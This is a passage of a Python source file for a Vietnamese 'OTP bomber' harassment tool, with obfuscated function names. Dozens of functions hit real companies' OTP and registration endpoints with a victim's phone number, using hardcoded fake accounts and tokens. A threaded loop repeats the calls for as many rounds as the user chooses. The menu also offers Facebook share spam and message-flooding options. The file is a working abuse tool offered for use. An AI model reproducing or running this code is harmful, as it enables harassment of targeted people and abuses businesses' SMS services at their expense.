        json_data = {'phoneNumber': sdt, 'deviceId': 'd46a74f1-09b9-4db6-b022-aaa9d87e11ed', 'use_for': 'LOGIN'}
        response = requests.post('https://api.vato.vn/api/authenticate/request_code', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Futabus OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Futabus OTP Error:{Style.RESET_ALL} {e}")

def mmnnmnmnnmmmnnmnmmmmm(sdt):
    # ViettelPost
    try:
        data = {'FormRegister.FullName': OooOOo0O0oooO00OO0o0O(), 'FormRegister.Phone': sdt, 'FormRegister.Password': 'BEAUTYBOX12a@', 'FormRegister.ConfirmPassword': 'BEAUTYBOX12a@', 'ConfirmOtpType': 'Register', 'FormRegister.IsRegisterFromPhone': 'true'}
        response = requests.post('https://id.viettelpost.vn/Account/SendOTPByPhone', data=data, timeout=5)
        print(f"{Fore.GREEN}ViettelPost OTP response:{Style.RESET_ALL} OK")
    except Exception as e:
        print(f"{Fore.RED}ViettelPost OTP Error:{Style.RESET_ALL} {e}")

def jijjlljjjijjiiijjiilii(sdt):
    # Viettel (Đăng ký)
    try:
        json_data = {'msisdn': sdt}
        response = requests.post('https://viettel.vn/api/get-otp', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Viettel (Register) OTP response:{Style.RESET_ALL} OK")
    except Exception as e:
        print(f"{Fore.RED}Viettel (Register) OTP Error:{Style.RESET_ALL} {e}")

def WWWXXXWWXXXWWWXWWXWXWX(sdt):
    # Tokyo Life
    try:
        json_data = {'phone_number': sdt, 'name': OooOOo0O0oooO00OO0o0O(), 'password': 'pUL3.GFSd4MWYXp', 'email': 'reggg10tb@gmail.com', 'birthday': '2002-03-12', 'gender': 'male'}
        response = requests.post('https://api-prod.tokyolife.vn/khachhang-api/api/v1/auth/register', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Tokyo Life OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Tokyo Life OTP Error:{Style.RESET_ALL} {e}")

def XXWWXWWWXXWXWXXXXXW(sdt):
    # 30shine
    try:
        json_data = {'phone': sdt}
        response = requests.post('https://ls6trhs5kh.execute-api.ap-southeast-1.amazonaws.com/Prod/otp/send', json=json_data, timeout=5)
        print(f"{Fore.GREEN}30shine OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}30shine OTP Error:{Style.RESET_ALL} {e}")

def IJIILJILJLLLJJLLJLJILII(sdt):
    # Cathay Life
    try:
        memberMap_data = {"userName":"rancellramseyis792@gmail.com","password":"traveLo@a123","birthday":"03/07/2001","certificateNumber":"034202008372","phone":sdt,"email":"rancellramseyis792@gmail.com","LINK_FROM":"signUp2","memberID":"","CUSTOMER_NAME":OooOOo0O0oooO00OO0o0O()}
        data = {'memberMap': json.dumps(memberMap_data), 'OTP_TYPE': 'P', 'LANGS': 'vi_VN'}
        response = requests.post('https://www.cathaylife.com.vn/CPWeb/servlet/HttpDispatcher/CPZ1_0110/reSendOTP', data=data, timeout=5)
        print(f"{Fore.GREEN}Cathay Life OTP response:{Style.RESET_ALL} OK")
    except Exception as e:
        print(f"{Fore.RED}Cathay Life OTP Error:{Style.RESET_ALL} {e}")

def SS2S22SSSS2S2SS22SSS(sdt):
    # Dominos
    try:
        json_data = {'phone_number': sdt, 'email': 'rancellramseyis792@gmail.com', 'type': 0, 'is_register': True}
        response = requests.post('https://dominos.vn/api/v1/users/send-otp', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Dominos OTP response:{Style.RESET_ALL}", response.text)
    except requests.exceptions.ChunkedEncodingError:
        print(f"{Fore.YELLOW}Dominos OTP response:{Style.RESET_ALL} Lỗi mã hóa Chunked, có thể đã gửi.")
    except Exception as e:
        print(f"{Fore.RED}Dominos OTP Error:{Style.RESET_ALL} {e}")

def mmnmnnmnnnmmmnmmmnmnnmm(sdt):
    # Vinamilk
    try:
        data = f'{{"type":"register","phone":"{sdt}"}}'
        response = requests.post('https://new.vinamilk.com.vn/api/account/getotp', data=data, timeout=5)
        print(f"{Fore.GREEN}Vinamilk OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Vinamilk OTP Error:{Style.RESET_ALL} {e}")

def MMNMMMMMMNNMNMMNNMMM(sdt):
    # Batdongsan.com.vn
    try:
        params = {'phoneNumber': sdt}
        response = requests.get('https://batdongsan.com.vn/user-management-service/api/v1/Otp/SendToRegister', params=params, timeout=5)
        print(f"{Fore.GREEN}Batdongsan OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Batdongsan OTP Error:{Style.RESET_ALL} {e}")

def jljijilllljjlijjjll(sdt):
    # Gumac
    try:
        json_data = {'phone': sdt}
        response = requests.post('https://cms.gumac.vn/api/v1/customers/verify-phone-number', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Gumac OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Gumac OTP Error:{Style.RESET_ALL} {e}")

def WXXXXWXWWWXWWWXXWXWXXXXXX(sdt):
    # Mutosi (Register)
    try:
        json_data = {'name': OooOOo0O0oooO00OO0o0O(), 'phone': sdt, 'password': 'Vjyy1234@', 'confirm_password': 'Vjyy1234@', 'verify_otp': 0, 'email': 'dđ@gmail.com'}
        response = requests.post('https://api-omni.mutosi.com/client/auth/register', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Mutosi (Register) OTP response:{Style.RESET_ALL}", response.json())
    except Exception as e:
        print(f"{Fore.RED}Mutosi (Register) OTP Error:{Style.RESET_ALL} {e}")

def MMNMMNMMMNNMNNNMNNN(sdt):
    # Mutosi (Reset Password)
    try:
        json_data = {'phone': sdt, 'token': '03AFcWeA4O6j16gs8gKD9Zvb-gkvoC-kBTVH1xtMZrMmjfODRDkXlTkAzqS6z0cT_96PI4W-sLoELf2xrLnCpN0YvCs3q90pa8Hq52u2dIqknP5o7ZY-5isVxiouDyBbtPsQEzaVdXm0KXmAYPn0K-wy1rKYSAQWm96AVyKwsoAlFoWpgFeTHt_-J8cGBmpWcVcmOPg-D4-EirZ5J1cAGs6UtmKW9PkVZRHHwqX-tIv59digmt-KuxGcytzrCiuGqv6Rk8H52tiVzyNTtQRg6JmLpxe7VCfXEqJarPiR15tcxoo1RamCtFMkwesLd39wHBDHxoyiUah0P4NLbqHU1KYISeKbGiuZKB2baetxWItDkfZ5RCWIt5vcXXeF0TF7EkTQt635L7r1wc4O4p1I-vwapHFcBoWSStMOdjQPIokkGGo9EE-APAfAtWQjZXc4H7W3Aaj0mTLpRpZBV0TE9BssughbVXkj5JtekaSOrjrqnU0tKeNOnGv25iCg11IplsxBSr846YvJxIJqhTvoY6qbpFZymJgFe53vwtJhRktA3jGEkCFRdpFmtw6IMbfgaFxGsrMb2wkl6armSvVyxx9YKRYkwNCezXzRghV8ZtLHzKwbFgA6ESFRoIHwDIRuup4Da2Bxq4f2351XamwzEQnha6ekDE2GJbTw', 'source': 'web_consumers'}
        response = requests.post('https://api-omni.mutosi.com/client/auth/reset-password/send-phone', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Mutosi (Reset) OTP response:{Style.RESET_ALL}", response.json())
    except Exception as e:
        print(f"{Fore.RED}Mutosi (Reset) OTP Error:{Style.RESET_ALL} {e}")

def WWXXWWXWWXXWWXWWWWW(sdt):
    # VietAir (DANG_KY_NHAN_OTP)
    try:
        data = {'op': 'PACKAGE_HTTP_POST', 'path_ajax_post': '/service03/sms/get', 'package_name': 'PK_FD_SMS_OTP', 'object_name': 'INS', 'P_MOBILE': sdt, 'P_TYPE_ACTIVE_CODE': 'DANG_KY_NHAN_OTP'}
        response = requests.post('https://vietair.com.vn/Handler/CoreHandler.ashx', data=data, timeout=5)
        print(f"{Fore.GREEN}VietAir OTP response:{Style.RESET_ALL}", response.json())
    except Exception as e:
        print(f"{Fore.RED}VietAir OTP Error:{Style.RESET_ALL} {e}")

def IILLILJLLLJLIJIJJ(sdt):
    # Fahasa (Check Phone)
    try:
        data = {'phone': sdt}
        response = requests.post('https://www.fahasa.com/ajaxlogin/ajax/checkPhone', data=data, timeout=5)
        print(f"{Fore.GREEN}Fahasa OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Fahasa OTP Error:{Style.RESET_ALL} {e}")

def jijiijjijllijijji(sdt):
    # Shopiness
    try:
        data = {'action': 'verify-registration-info', 'phoneNumber': sdt, 'refCode': ''}
        response = requests.post('https://shopiness.vn/ajax/user', data=data, timeout=5)
        print(f"{Fore.GREEN}Shopiness OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Shopiness OTP Error:{Style.RESET_ALL} {e}")

def WXWWXWXWWWWWXXWWXXWXW(sdt):
    # Mocha (V2SS)
    try:
        url = "https://v2sslapimocha35.mocha.com.vn/ReengBackendBiz/genotp/v32"
        payload = f"clientType=ios&countryCode=VN&device=iPhone15%2C3&os_version=iOS_17.0.2&platform=ios&revision=11224&username={sdt}&version=1.28"
        headers = {'Content-Type': "application/x-www-form-urlencoded"}
        response = requests.post(url, data=payload, headers=headers, timeout=5)
        print(f"{Fore.GREEN}Mocha (V2SS) OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Mocha (V2SS) OTP Error:{Style.RESET_ALL} {e}")

def jjljjljjilijijjiljljjiil(sdt):
    # Bibabo
    try:
        params = {'phone': sdt, 'reCaptchaToken': "undefined", 'appId': "7", 'version': "2"}
        response = requests.get('https://one.bibabo.vn/api/v1/login/otp/createOtp', params=params, timeout=5)
        print(f"{Fore.GREEN}Bibabo OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Bibabo OTP Error:{Style.RESET_ALL} {e}")

def OOooDOOoOODOOOoDOoOo(sdt):
    # Moca
    try:
        params = {'phoneNumber': sdt}
        response = requests.get('https://moca.vn/moca/v2/users/role', params=params, timeout=5)
        print(f"{Fore.GREEN}Moca OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Moca OTP Error:{Style.RESET_ALL} {e}")

def ljlljjlljiiiljljjlij(sdt):
    # Pantio
    try:
        data = {'phoneNumber': sdt}
        params = {'domain': 'pantiofashion.myharavan.com'}
        response = requests.post('https://api.suplo.vn/v1/auth/customer/otp/sms/generate', params=params, data=data, timeout=5)
        print(f"{Fore.GREEN}Pantio OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Pantio OTP Error:{Style.RESET_ALL} {e}")

def SS22SSSS22222S2SS2S2S(sdt):
    # Routine
    try:
        data = {'telephone': sdt, 'isForgotPassword': '0'}
        response = requests.post('https://routine.vn/customer/otp/send/', data=data, timeout=5)
        print(f"{Fore.GREEN}Routine OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Routine OTP Error:{Style.RESET_ALL} {e}")

def jjliliijiijijllijlll(sdt):
    # Tima
    try:
        data = {'application_full_name': OooOOo0O0oooO00OO0o0O(), 'application_mobile_phone': sdt, 'CityId': '1', 'DistrictId': '16', 'rules': 'true', 'TypeTime': '1', 'application_amount': '0', 'application_term': '0', 'IsApply': '1', 'product_id': '2'}
        response = requests.post('https://tima.vn/Borrower/RegisterLoanCreditFast', data=data, timeout=5)
        print(f"{Fore.GREEN}Tima OTP response:{Style.RESET_ALL} OK")
    except Exception as e:
        print(f"{Fore.RED}Tima OTP Error:{Style.RESET_ALL} {e}")

def nmnmnnmmmmnmmnnnnnnmnnmn(sdt):
    # Paynet
    try:
        data = {'MobileNumber': sdt, 'IsForget': 'N'}
        response = requests.post('https://merchant.paynetone.vn/User/GetOTP', data=data, verify=False, timeout=5)
        print(f"{Fore.GREEN}Paynet OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Paynet OTP Error:{Style.RESET_ALL} {e}")

def nmnmnnmnmmnmmmmmnm(sdt):
    # MoneyGo
    try:
        data = {'_token': 'X7pFLFlcnTEmsfjHE5kcPA1KQyhxf6qqL6uYtWCV', 'total': '56688000', 'phone': sdt, 'agree': '1'}
        response = requests.post('https://moneygo.vn/dang-ki-vay-nhanh', data=data, timeout=5)
        print(f"{Fore.GREEN}MoneyGo OTP response:{Style.RESET_ALL} OK")
    except Exception as e:
        print(f"{Fore.RED}MoneyGo OTP Error:{Style.RESET_ALL} {e}")

def lIllIlIIlllIllllIIIII(sdt):
    # Pico (Request OTP)
    try:
        json_data_2 = {'phone': sdt}
        headers_2 = {'access': '206f5b6838b4e357e98bf68dbb8cdea5', 'channel': 'b2c', 'party': 'ecom', 'platform': 'Desktop', 'uuid': 'cc31d0b5815a483b92f547ab8438da53'}
        response_2 = requests.post('https://auth.pico.vn/user/api/auth/login/request-otp', headers=headers_2, json=json_data_2, timeout=5)
        print(f"{Fore.GREEN}Pico OTP response:{Style.RESET_ALL}", response_2.json())
    except Exception as e:
        print(f"{Fore.RED}Pico OTP Error:{Style.RESET_ALL} {e}")

def MNMNNNNNNNNMNMNMNNMMNM(sdt):
    # PNJ (ZNS)
    try:
        data = {'_method': 'POST', '_token': '0BBfISeNy2M92gosYZryQ5KbswIDry4KRjeLwvhU', 'type': 'zns', 'phone': sdt}
        response = requests.post('https://www.pnj.com.vn/customer/otp/request', data=data, timeout=5)
        print(f"{Fore.GREEN}PNJ OTP response:{Style.RESET_ALL} OK")
    except Exception as e:
        print(f"{Fore.RED}PNJ OTP Error:{Style.RESET_ALL} {e}")

def JLLLLILLJIILJLIILIIJIJLJ(sdt):
    # Tiniworld
    try:
        data = {'clientId': '609168b9f8d5275ea1e262d6', 'redirectUrl': 'https://tiniworld.com', 'phone': sdt}
        response = requests.post('https://prod-tini-id.nkidworks.com/auth/tinizen', data=data, timeout=5)
        print(f"{Fore.GREEN}Tiniworld OTP response:{Style.RESET_ALL} OK")
    except Exception as e:
        print(f"{Fore.RED}Tiniworld OTP Error:{Style.RESET_ALL} {e}")

def xwwwxwxwxxxxwwwxxxw(sdt):
    # Takomo (IVR - Voice)
    try:
        json_data = {'data': {'phone': sdt, 'code': 'resend', 'channel': 'ivr'}}
        response_post = requests.post('https://lk.takomo.vn/api/4/client/otp/send', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Takomo (IVR) OTP response:{Style.RESET_ALL}", response_post.text)
    except Exception as e:
        print(f"{Fore.RED}Takomo (IVR) OTP Error:{Style.RESET_ALL} {e}")

def LJJJJLJIJLLJLJILJLIILLIIL(phone, i):
    # Danh sách các hàm SMS Spam
    functions = [
        XWXWWWXWWWXXXXXXWW, lIlIlllllllIllIlI, S2S22SS22SSSSSSSSS2SS, OODOOooDoOOoOoOooDD,
        JIILIILJJILJJILJIILLJILI, S222SSSSSS222S2SS2SS22222S, lIIllIlllIIllIIlIllI, DOOOOoDDDOODDDDoDooO,
        llIllIIIIlIlIIlIlIlll, NMMNNNMMNMMMMNNNM, XWWWWXWXWXXXXXXWXXW, MNMNNNMNMNMNNNMMNNMN,
        OO00OoO0o0Oo0ooOOo0OOO0o, Oo0oO0ooooo0O000O0ooO, LJIJIILJJJLIJLJJILJ, IlIIIlIlllIlIIlIlIlll,
        IlIIlllIIlIIIIlIIllIll, ODoOODODDOOOOOODDoDDOO, XXWXWWWXXXXXXWXXXWXXX, OOoO0O0OO000Oo00OooO0O0o,
        xxwxxxxxxxwwwxwwwxxxxwx, JLJLLIJJLJLJIIIIJLLLJJJJL, oOOoDDDDoOoDoOoooO, lIlIIIIIIIIlIlIIlllI,
        XWWWWXWXXWXXXXXXWXW, O00oOoOo0O0Oo0OO00OO0, WWWWWWXWXWXWXXWWW, xxwxxxxxxxxwwwxwwwxxxxwx,
        IllIIlIIIlIIlIIlIlI, xxwwwxwwwwxwxwwxxx, lljjjjliiiljijljli, liljliiiijijljljl,
        O0O0OOoOoO0oOoOOOOoo0oOOO0, NMNMMMMNMNMNMMNMNN, DOooOoOOOODoODoooDO, S22SSS2SSSS22222SSS22, 
        IIIIllllIllIIIIllIIIllI, IIllIllIlllIlllII, mmnnmnmnnmmmnnmnmmmmm, jijjlljjjijjiiijjiilii,
        WWWXXXWWXXXWWWXWWXWXWX, XXWWXWWWXXWXWXXXXXW, IJIILJILJLLLJJLLJLJILII, SS2S22SSSS2S2SS22SSS, 
        mmnmnnmnnnmmmnmmmnmnnmm, MMNMMMMMMNNMNMMNNMMM, jljijilllljjlijjjll, WXXXXWXWWWXWWWXXWXWXXXXXX,
        MMNMMNMMMNNMNNNMNNN, WWXXWWXWWXXWWXWWWWW, IILLILJLLLJLIJIJJ, jijiijjijllijijji,
        WXWWXWXWWWWWXXWWXXWXW, jjljjljjilijijjiljljjiil, OOooDOOoOODOOOoDOoOo, ljlljjlljiiiljljjlij,
        SS22SSSS22222S2SS2S2S, jjliliijiijijllijlll, nmnmnnmnmmnmmmmmnm, lIllIlIIlllIllllIIIII, MNMNNNNNNNNMNMNMNNMMNM, JLLLLILLJIILJLIILIIJIJLJ,
    ]

    with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
        futures = [executor.submit(fn, phone) for fn in functions]

        for future in concurrent.futures.as_completed(futures):
            try:
                future.result()
            except Exception as exc:
                print(f'{Fore.RED}Đã xảy ra lỗi trong thread:{Style.RESET_ALL} {exc}')

    print(f"\n{Fore.CYAN}--- {Style.BRIGHT}Vòng {i} Đã Hoàn Thành. {Style.RESET_ALL}")
    for j in range(4, 0, -1):
        print(f"{Fore.YELLOW}Vui lòng chờ {j} giây... {Style.RESET_ALL}", end="\r")
        time.sleep(1)

def start_spam_sms_tool():
    clear_screen()
    print(f"""
{Fore.CYAN}┌──────────────────────── Info ───────────────────────┐
{Fore.YELLOW} ➜ {Fore.WHITE}Admin⭐: Bình 💌(
{Fore.YELLOW} ➜ {Fore.WHITE}Zalo : 🔰0377994308.
{Fore.YELLOW} ➜ {Fore.WHITE}TOOL GỘP 🌠💬
{Fore.YELLOW} ➜ {Fore.WHITE}CHỨC NĂNG SMS SPAM/OTP BOMBER⚔
{Fore.CYAN}└─────────────────────────────────────────────────────┘
    """)
    
    phone = input(f"{Fore.BLUE}Nhập SĐT nạn nhân (ví dụ: 0912345678): {Fore.YELLOW}")
    
    # Chuẩn hóa SĐT (loại bỏ khoảng trắng, dấu trừ)
    phone = phone.strip().replace(' ', '').replace('-', '')
    
    if not phone.isdigit() or len(phone) < 9:
        print(f"{Fore.RED}SĐT không hợp lệ! Vui lòng nhập lại.{Style.RESET_ALL}")
        sleep(2)
        return

    try:
        count = int(input(f"{Fore.BLUE}Nhập số lần spam (Vòng lặp): {Fore.YELLOW}"))
    except ValueError:
        print(f"{Fore.RED}Số lần spam không hợp lệ! Mặc định là 1.{Style.RESET_ALL}")
        count = 1
    
    print(f"\n{Fore.GREEN}*** BẮT ĐẦU SPAM SĐT: {phone} - SỐ VÒNG: {count} ***{Style.RESET_ALL}\n")

    try:
        for i in range(1, count + 1):
            LJJJJLJIJLLJLJILJLIILLIIL(phone, i)
    except KeyboardInterrupt:
        print(f"\n{Fore.YELLOW}Chương trình bị dừng bởi người dùng (Ctrl+C). Quay lại Menu chính.{Style.RESET_ALL}")
    except Exception as e:
        print(f"{Fore.RED}Đã xảy ra lỗi không mong muốn trong quá trình spam: {e}{Style.RESET_ALL}")

    sleep(3)


# ==============================================================================
# --- MENU CHÍNH ---
# ==============================================================================

def main_menu():
    while True:
        main_banner()
        
        table = Table(title="CHỨC NĂNG BÙI ĐÌNH BÌNH", title_style="bold bright_yellow", border_style="bright_cyan")
        table.add_column("Mã", style="bold green", justify="center")
        table.add_column("Chức năng", style="bold white")
        table.add_column("Mô tả", style="magenta")
        
        table.add_row("[1]", "FACEBOOK SHARE LIÊN TỤC", "Tăng lượt Share cho bài viết ")
        table.add_row("[2]", "CODELAG ⚔", "Spam/Gửi tin nhắn nhanh vào Box ")
        table.add_row("[3]", "SMS SPAM / OTP BOMBER 💣", "Gửi hàng loạt OTP đến SĐT nạn nhân")
        table.add_row("---", "---", "---")
        table.add_row("[0]", "THOÁT TOOL 🕊", "Đóng chương trình", style="bold red")

        console.print(table, justify="center")
        
        try:
            chon = console.input(f"{Colors.GREEN}➩ {Colors.WHITE}Chọn mã chức năng: {Colors.YELLOW}")
            if not chon.isdigit(): raise ValueError
            chon = int(chon)
            
            if chon == 1:
                start_share_tool()
            elif chon == 2:
                run_codelag_tool()
            elif chon == 3:
                start_spam_sms_tool()
            elif chon == 0:
                print(f"{Colors.GREEN}[Bùi Đình Tool] Thoát tool thành công. Hẹn gặp lại!")
                sys.exit()
            else:
                print(f"{Colors.RED}[LỖI] Lựa chọn không hợp lệ! Vui lòng chọn lại.")
                sleep(2)
                
        except ValueError:
            print(f"{Colors.RED}[LỖI] Vui lòng nhập số!")
            sleep(2)
        except KeyboardInterrupt:
            print(f"\n{Colors.GREEN}[Bùi Đình Tool] Thoát tool thành công.")
            sys.exit()


if __name__ == "__main__":
    # Đảm bảo các thư viện cần thiết đã được cài đặt
    try:
        import rich
        import colorama
    except ImportError:
        print("Lỗi: Các thư viện 'rich' hoặc 'colorama' chưa được cài đặt. Vui lòng chạy: pip install rich colorama")
        sys.exit(1)
        
    main_menu()
